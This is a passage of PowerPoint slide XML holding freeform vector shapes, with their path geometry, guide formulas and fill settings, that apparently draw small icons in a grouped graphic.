                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BDD4856-C974-A64F-B3C8-B0E458BB8031}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="14227176" y="1130301"/>
              <a:ext cx="47625" cy="250825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 87 w 113"/>
                <a:gd name="T1" fmla="*/ 604 h 604"/>
                <a:gd name="T2" fmla="*/ 25 w 113"/>
                <a:gd name="T3" fmla="*/ 604 h 604"/>
                <a:gd name="T4" fmla="*/ 0 w 113"/>
                <a:gd name="T5" fmla="*/ 579 h 604"/>
                <a:gd name="T6" fmla="*/ 25 w 113"/>
                <a:gd name="T7" fmla="*/ 554 h 604"/>
                <a:gd name="T8" fmla="*/ 62 w 113"/>
                <a:gd name="T9" fmla="*/ 554 h 604"/>
                <a:gd name="T10" fmla="*/ 62 w 113"/>
                <a:gd name="T11" fmla="*/ 164 h 604"/>
                <a:gd name="T12" fmla="*/ 48 w 113"/>
                <a:gd name="T13" fmla="*/ 37 h 604"/>
                <a:gd name="T14" fmla="*/ 62 w 113"/>
                <a:gd name="T15" fmla="*/ 4 h 604"/>
                <a:gd name="T16" fmla="*/ 95 w 113"/>
                <a:gd name="T17" fmla="*/ 19 h 604"/>
                <a:gd name="T18" fmla="*/ 112 w 113"/>
                <a:gd name="T19" fmla="*/ 164 h 604"/>
                <a:gd name="T20" fmla="*/ 112 w 113"/>
                <a:gd name="T21" fmla="*/ 579 h 604"/>
                <a:gd name="T22" fmla="*/ 87 w 113"/>
                <a:gd name="T23" fmla="*/ 6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 h="604">
                  <a:moveTo>
                    <a:pt x="87" y="604"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="604"/>
                    <a:pt x="25" y="604"/>
                    <a:pt x="25" y="604"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="604"/>
                    <a:pt x="0" y="593"/>
                    <a:pt x="0" y="579"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="566"/>
                    <a:pt x="11" y="554"/>
                    <a:pt x="25" y="554"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="554"/>
                    <a:pt x="62" y="554"/>
                    <a:pt x="62" y="554"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="164"/>
                    <a:pt x="62" y="164"/>
                    <a:pt x="62" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="139"/>
                    <a:pt x="60" y="68"/>
                    <a:pt x="48" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="24"/>
                    <a:pt x="49" y="10"/>
                    <a:pt x="62" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="0"/>
                    <a:pt x="90" y="6"/>
                    <a:pt x="95" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="64"/>
                    <a:pt x="112" y="154"/>
                    <a:pt x="112" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="579"/>
                    <a:pt x="112" y="579"/>
                    <a:pt x="112" y="579"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="593"/>
                    <a:pt x="101" y="604"/>
                    <a:pt x="87" y="6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66" name="Freeform 223">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8400EA5-DC7E-5E4A-8F25-2140DC9F0D9E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="13884276" y="1042988"/>
              <a:ext cx="204788" cy="42863"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 29 w 493"/>
                <a:gd name="T1" fmla="*/ 101 h 101"/>
                <a:gd name="T2" fmla="*/ 5 w 493"/>
                <a:gd name="T3" fmla="*/ 84 h 101"/>
                <a:gd name="T4" fmla="*/ 20 w 493"/>
                <a:gd name="T5" fmla="*/ 52 h 101"/>
                <a:gd name="T6" fmla="*/ 472 w 493"/>
                <a:gd name="T7" fmla="*/ 45 h 101"/>
                <a:gd name="T8" fmla="*/ 489 w 493"/>
                <a:gd name="T9" fmla="*/ 77 h 101"/>
                <a:gd name="T10" fmla="*/ 457 w 493"/>
                <a:gd name="T11" fmla="*/ 93 h 101"/>
                <a:gd name="T12" fmla="*/ 37 w 493"/>
                <a:gd name="T13" fmla="*/ 99 h 101"/>
                <a:gd name="T14" fmla="*/ 29 w 493"/>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101">
                  <a:moveTo>
                    <a:pt x="29" y="101"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="101"/>
                    <a:pt x="8" y="94"/>
                    <a:pt x="5" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="71"/>
                    <a:pt x="7" y="57"/>
                    <a:pt x="20" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="2"/>
                    <a:pt x="326" y="0"/>
                    <a:pt x="472" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="486" y="50"/>
                    <a:pt x="493" y="64"/>
                    <a:pt x="489" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="485" y="90"/>
                    <a:pt x="471" y="97"/>
                    <a:pt x="457" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="51"/>
                    <a:pt x="172" y="53"/>
                    <a:pt x="37" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="100"/>
                    <a:pt x="31" y="101"/>
                    <a:pt x="2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67" name="Freeform 224">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C97D7AA-B3C3-9544-8F08-B75FFF768D7F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="13744576" y="954088"/>
              <a:ext cx="120650" cy="136525"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 146 w 292"/>
                <a:gd name="T1" fmla="*/ 326 h 326"/>
                <a:gd name="T2" fmla="*/ 0 w 292"/>
                <a:gd name="T3" fmla="*/ 180 h 326"/>
                <a:gd name="T4" fmla="*/ 0 w 292"/>
                <a:gd name="T5" fmla="*/ 146 h 326"/>
                <a:gd name="T6" fmla="*/ 22 w 292"/>
                <a:gd name="T7" fmla="*/ 69 h 326"/>
                <a:gd name="T8" fmla="*/ 56 w 292"/>
                <a:gd name="T9" fmla="*/ 61 h 326"/>
                <a:gd name="T10" fmla="*/ 64 w 292"/>
                <a:gd name="T11" fmla="*/ 96 h 326"/>
                <a:gd name="T12" fmla="*/ 50 w 292"/>
                <a:gd name="T13" fmla="*/ 146 h 326"/>
                <a:gd name="T14" fmla="*/ 50 w 292"/>
                <a:gd name="T15" fmla="*/ 180 h 326"/>
                <a:gd name="T16" fmla="*/ 146 w 292"/>
                <a:gd name="T17" fmla="*/ 276 h 326"/>
                <a:gd name="T18" fmla="*/ 242 w 292"/>
                <a:gd name="T19" fmla="*/ 180 h 326"/>
                <a:gd name="T20" fmla="*/ 242 w 292"/>
                <a:gd name="T21" fmla="*/ 146 h 326"/>
                <a:gd name="T22" fmla="*/ 146 w 292"/>
                <a:gd name="T23" fmla="*/ 50 h 326"/>
                <a:gd name="T24" fmla="*/ 102 w 292"/>
                <a:gd name="T25" fmla="*/ 61 h 326"/>
                <a:gd name="T26" fmla="*/ 68 w 292"/>
                <a:gd name="T27" fmla="*/ 50 h 326"/>
                <a:gd name="T28" fmla="*/ 78 w 292"/>
                <a:gd name="T29" fmla="*/ 16 h 326"/>
                <a:gd name="T30" fmla="*/ 146 w 292"/>
                <a:gd name="T31" fmla="*/ 0 h 326"/>
                <a:gd name="T32" fmla="*/ 292 w 292"/>
                <a:gd name="T33" fmla="*/ 146 h 326"/>
                <a:gd name="T34" fmla="*/ 292 w 292"/>
                <a:gd name="T35" fmla="*/ 180 h 326"/>
                <a:gd name="T36" fmla="*/ 146 w 292"/>
                <a:gd name="T37"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2" h="326">
                  <a:moveTo>
                    <a:pt x="146" y="326"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="326"/>
                    <a:pt x="0" y="261"/>
                    <a:pt x="0" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="146"/>
                    <a:pt x="0" y="146"/>
                    <a:pt x="0" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="119"/>
                    <a:pt x="7" y="92"/>
                    <a:pt x="22" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="58"/>
                    <a:pt x="44" y="54"/>
                    <a:pt x="56" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="68"/>
                    <a:pt x="72" y="84"/>
                    <a:pt x="64" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="111"/>
                    <a:pt x="50" y="128"/>
                    <a:pt x="50" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="180"/>
                    <a:pt x="50" y="180"/>
                    <a:pt x="50" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="233"/>
                    <a:pt x="93" y="276"/>
                    <a:pt x="146" y="276"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="276"/>
                    <a:pt x="242" y="233"/>
                    <a:pt x="242" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="242" y="146"/>
                    <a:pt x="242" y="146"/>
                    <a:pt x="242" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="242" y="93"/>
                    <a:pt x="199" y="50"/>
                    <a:pt x="146" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="50"/>
                    <a:pt x="115" y="54"/>
                    <a:pt x="102" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="67"/>
                    <a:pt x="74" y="63"/>
                    <a:pt x="68" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="38"/>
                    <a:pt x="66" y="23"/>
                    <a:pt x="78" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="6"/>
                    <a:pt x="123" y="0"/>
                    <a:pt x="146" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="0"/>
                    <a:pt x="292" y="66"/>
                    <a:pt x="292" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292" y="180"/>
                    <a:pt x="292" y="180"/>
                    <a:pt x="292" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292" y="261"/>
                    <a:pt x="227" y="326"/>
                    <a:pt x="146" y="3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68" name="Freeform 225">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{241C0F18-E19B-3D40-90FD-C1747A3603F5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="14098589" y="954088"/>
              <a:ext cx="122238" cy="136525"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 147 w 293"/>
                <a:gd name="T1" fmla="*/ 326 h 326"/>
                <a:gd name="T2" fmla="*/ 0 w 293"/>
                <a:gd name="T3" fmla="*/ 180 h 326"/>
                <a:gd name="T4" fmla="*/ 0 w 293"/>
                <a:gd name="T5" fmla="*/ 146 h 326"/>
                <a:gd name="T6" fmla="*/ 22 w 293"/>
                <a:gd name="T7" fmla="*/ 69 h 326"/>
                <a:gd name="T8" fmla="*/ 57 w 293"/>
                <a:gd name="T9" fmla="*/ 61 h 326"/>
                <a:gd name="T10" fmla="*/ 65 w 293"/>
                <a:gd name="T11" fmla="*/ 96 h 326"/>
                <a:gd name="T12" fmla="*/ 51 w 293"/>
                <a:gd name="T13" fmla="*/ 146 h 326"/>
                <a:gd name="T14" fmla="*/ 51 w 293"/>
                <a:gd name="T15" fmla="*/ 180 h 326"/>
                <a:gd name="T16" fmla="*/ 147 w 293"/>
                <a:gd name="T17" fmla="*/ 276 h 326"/>
                <a:gd name="T18" fmla="*/ 243 w 293"/>
                <a:gd name="T19" fmla="*/ 180 h 326"/>
                <a:gd name="T20" fmla="*/ 243 w 293"/>
                <a:gd name="T21" fmla="*/ 146 h 326"/>
                <a:gd name="T22" fmla="*/ 147 w 293"/>
                <a:gd name="T23" fmla="*/ 50 h 326"/>
                <a:gd name="T24" fmla="*/ 102 w 293"/>
                <a:gd name="T25" fmla="*/ 61 h 326"/>
                <a:gd name="T26" fmla="*/ 68 w 293"/>
                <a:gd name="T27" fmla="*/ 50 h 326"/>
                <a:gd name="T28" fmla="*/ 79 w 293"/>
                <a:gd name="T29" fmla="*/ 16 h 326"/>
                <a:gd name="T30" fmla="*/ 147 w 293"/>
                <a:gd name="T31" fmla="*/ 0 h 326"/>
                <a:gd name="T32" fmla="*/ 293 w 293"/>
                <a:gd name="T33" fmla="*/ 146 h 326"/>
                <a:gd name="T34" fmla="*/ 293 w 293"/>
                <a:gd name="T35" fmla="*/ 180 h 326"/>
                <a:gd name="T36" fmla="*/ 147 w 293"/>
                <a:gd name="T37"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326">
                  <a:moveTo>
                    <a:pt x="147" y="326"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="326"/>
                    <a:pt x="0" y="261"/>
                    <a:pt x="0" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="146"/>
                    <a:pt x="0" y="146"/>
                    <a:pt x="0" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="119"/>
                    <a:pt x="8" y="92"/>
                    <a:pt x="22" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="58"/>
                    <a:pt x="45" y="54"/>
                    <a:pt x="57" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="69"/>
                    <a:pt x="72" y="84"/>
                    <a:pt x="65" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="111"/>
                    <a:pt x="51" y="128"/>
                    <a:pt x="51" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="180"/>
                    <a:pt x="51" y="180"/>
                    <a:pt x="51" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="233"/>
                    <a:pt x="94" y="276"/>
                    <a:pt x="147" y="276"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="276"/>
                    <a:pt x="243" y="233"/>
                    <a:pt x="243" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="146"/>
                    <a:pt x="243" y="146"/>
                    <a:pt x="243" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="93"/>
                    <a:pt x="200" y="50"/>
                    <a:pt x="147" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="50"/>
                    <a:pt x="116" y="54"/>
                    <a:pt x="102" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="67"/>
                    <a:pt x="75" y="63"/>
                    <a:pt x="68" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="38"/>
                    <a:pt x="67" y="23"/>
                    <a:pt x="79" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="6"/>
                    <a:pt x="123" y="0"/>
                    <a:pt x="147" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="0"/>
                    <a:pt x="293" y="66"/>
                    <a:pt x="293" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="180"/>
                    <a:pt x="293" y="180"/>
                    <a:pt x="293" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="261"/>
                    <a:pt x="227" y="326"/>
                    <a:pt x="147" y="3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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="173" name="Group 172">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFBC9D67-D6B4-D24F-936F-81D7FF2626DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8433580" y="3540937"/>
            <a:ext cx="365095" cy="364223"/>
            <a:chOff x="8427983" y="3189038"/>
            <a:chExt cx="365095" cy="364223"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="174" name="Freeform 276">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{879A86BF-366D-0E4A-8594-AC7BB613B658}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8666732" y="3189038"/>
              <a:ext cx="126346" cy="126346"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 371 w 548"/>
                <a:gd name="T1" fmla="*/ 549 h 549"/>
                <a:gd name="T2" fmla="*/ 371 w 548"/>
                <a:gd name="T3" fmla="*/ 549 h 549"/>
                <a:gd name="T4" fmla="*/ 353 w 548"/>
                <a:gd name="T5" fmla="*/ 541 h 549"/>
                <a:gd name="T6" fmla="*/ 307 w 548"/>
                <a:gd name="T7" fmla="*/ 496 h 549"/>
                <a:gd name="T8" fmla="*/ 307 w 548"/>
                <a:gd name="T9" fmla="*/ 460 h 549"/>
                <a:gd name="T10" fmla="*/ 343 w 548"/>
                <a:gd name="T11" fmla="*/ 460 h 549"/>
                <a:gd name="T12" fmla="*/ 371 w 548"/>
                <a:gd name="T13" fmla="*/ 488 h 549"/>
                <a:gd name="T14" fmla="*/ 463 w 548"/>
                <a:gd name="T15" fmla="*/ 395 h 549"/>
                <a:gd name="T16" fmla="*/ 498 w 548"/>
                <a:gd name="T17" fmla="*/ 311 h 549"/>
                <a:gd name="T18" fmla="*/ 463 w 548"/>
                <a:gd name="T19" fmla="*/ 228 h 549"/>
                <a:gd name="T20" fmla="*/ 321 w 548"/>
                <a:gd name="T21" fmla="*/ 85 h 549"/>
                <a:gd name="T22" fmla="*/ 153 w 548"/>
                <a:gd name="T23" fmla="*/ 85 h 549"/>
                <a:gd name="T24" fmla="*/ 61 w 548"/>
                <a:gd name="T25" fmla="*/ 178 h 549"/>
                <a:gd name="T26" fmla="*/ 268 w 548"/>
                <a:gd name="T27" fmla="*/ 385 h 549"/>
                <a:gd name="T28" fmla="*/ 268 w 548"/>
                <a:gd name="T29" fmla="*/ 420 h 549"/>
                <a:gd name="T30" fmla="*/ 232 w 548"/>
                <a:gd name="T31" fmla="*/ 420 h 549"/>
                <a:gd name="T32" fmla="*/ 7 w 548"/>
                <a:gd name="T33" fmla="*/ 196 h 549"/>
                <a:gd name="T34" fmla="*/ 0 w 548"/>
                <a:gd name="T35" fmla="*/ 178 h 549"/>
                <a:gd name="T36" fmla="*/ 7 w 548"/>
                <a:gd name="T37" fmla="*/ 160 h 549"/>
                <a:gd name="T38" fmla="*/ 118 w 548"/>
                <a:gd name="T39" fmla="*/ 50 h 549"/>
                <a:gd name="T40" fmla="*/ 237 w 548"/>
                <a:gd name="T41" fmla="*/ 0 h 549"/>
                <a:gd name="T42" fmla="*/ 357 w 548"/>
                <a:gd name="T43" fmla="*/ 50 h 549"/>
                <a:gd name="T44" fmla="*/ 499 w 548"/>
                <a:gd name="T45" fmla="*/ 192 h 549"/>
                <a:gd name="T46" fmla="*/ 548 w 548"/>
                <a:gd name="T47" fmla="*/ 311 h 549"/>
                <a:gd name="T48" fmla="*/ 499 w 548"/>
                <a:gd name="T49" fmla="*/ 431 h 549"/>
                <a:gd name="T50" fmla="*/ 388 w 548"/>
                <a:gd name="T51" fmla="*/ 541 h 549"/>
                <a:gd name="T52" fmla="*/ 371 w 548"/>
                <a:gd name="T53" fmla="*/ 54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8" h="549">
                  <a:moveTo>
                    <a:pt x="371" y="549"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="371" y="549"/>
                    <a:pt x="371" y="549"/>
                    <a:pt x="371" y="549"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="364" y="549"/>
                    <a:pt x="357" y="546"/>
                    <a:pt x="353" y="541"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="307" y="496"/>
                    <a:pt x="307" y="496"/>
                    <a:pt x="307" y="496"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="297" y="486"/>
                    <a:pt x="297" y="470"/>
                    <a:pt x="307" y="460"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="317" y="450"/>
                    <a:pt x="333" y="450"/>
                    <a:pt x="343" y="460"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="371" y="488"/>
                    <a:pt x="371" y="488"/>
                    <a:pt x="371" y="488"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="463" y="395"/>
                    <a:pt x="463" y="395"/>
                    <a:pt x="463" y="395"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="485" y="373"/>
                    <a:pt x="498" y="343"/>
                    <a:pt x="498" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="498" y="280"/>
                    <a:pt x="485" y="250"/>
                    <a:pt x="463" y="228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="85"/>
                    <a:pt x="321" y="85"/>
                    <a:pt x="321" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="276" y="41"/>
                    <a:pt x="198" y="41"/>
                    <a:pt x="153" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="178"/>
                    <a:pt x="61" y="178"/>
                    <a:pt x="61" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="268" y="385"/>
                    <a:pt x="268" y="385"/>
                    <a:pt x="268" y="385"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="278" y="394"/>
                    <a:pt x="278" y="411"/>
                    <a:pt x="268" y="420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="258" y="430"/>
                    <a:pt x="242" y="430"/>
                    <a:pt x="232" y="420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="196"/>
                    <a:pt x="7" y="196"/>
                    <a:pt x="7" y="196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="191"/>
                    <a:pt x="0" y="185"/>
                    <a:pt x="0" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="171"/>
                    <a:pt x="2" y="165"/>
                    <a:pt x="7" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="50"/>
                    <a:pt x="118" y="50"/>
                    <a:pt x="118" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="18"/>
                    <a:pt x="192" y="0"/>
                    <a:pt x="237" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="0"/>
                    <a:pt x="325" y="18"/>
                    <a:pt x="357" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="499" y="192"/>
                    <a:pt x="499" y="192"/>
                    <a:pt x="499" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="224"/>
                    <a:pt x="548" y="266"/>
                    <a:pt x="548" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="548" y="357"/>
                    <a:pt x="531" y="399"/>
                    <a:pt x="499" y="431"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="541"/>
                    <a:pt x="388" y="541"/>
                    <a:pt x="388" y="541"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="384" y="546"/>
                    <a:pt x="377" y="549"/>
                    <a:pt x="371" y="5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75" name="Line 277">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE10DE83-16A5-EB40-B5F6-104DD4424A36}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8515118" y="3435629"/>
              <a:ext cx="0" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln w="22225" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="555557"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>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76" name="Freeform 278">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2CC76A3-E8AC-E040-9F3E-40F8AA51BF28}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8483749" y="3236091"/>
              <a:ext cx="261404" cy="207381"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 607 w 1134"/>
                <a:gd name="T1" fmla="*/ 898 h 898"/>
                <a:gd name="T2" fmla="*/ 589 w 1134"/>
                <a:gd name="T3" fmla="*/ 891 h 898"/>
                <a:gd name="T4" fmla="*/ 589 w 1134"/>
                <a:gd name="T5" fmla="*/ 855 h 898"/>
                <a:gd name="T6" fmla="*/ 1071 w 1134"/>
                <a:gd name="T7" fmla="*/ 373 h 898"/>
                <a:gd name="T8" fmla="*/ 761 w 1134"/>
                <a:gd name="T9" fmla="*/ 64 h 898"/>
                <a:gd name="T10" fmla="*/ 45 w 1134"/>
                <a:gd name="T11" fmla="*/ 779 h 898"/>
                <a:gd name="T12" fmla="*/ 9 w 1134"/>
                <a:gd name="T13" fmla="*/ 779 h 898"/>
                <a:gd name="T14" fmla="*/ 9 w 1134"/>
                <a:gd name="T15" fmla="*/ 744 h 898"/>
                <a:gd name="T16" fmla="*/ 743 w 1134"/>
                <a:gd name="T17" fmla="*/ 10 h 898"/>
                <a:gd name="T18" fmla="*/ 779 w 1134"/>
                <a:gd name="T19" fmla="*/ 10 h 898"/>
                <a:gd name="T20" fmla="*/ 1125 w 1134"/>
                <a:gd name="T21" fmla="*/ 356 h 898"/>
                <a:gd name="T22" fmla="*/ 1125 w 1134"/>
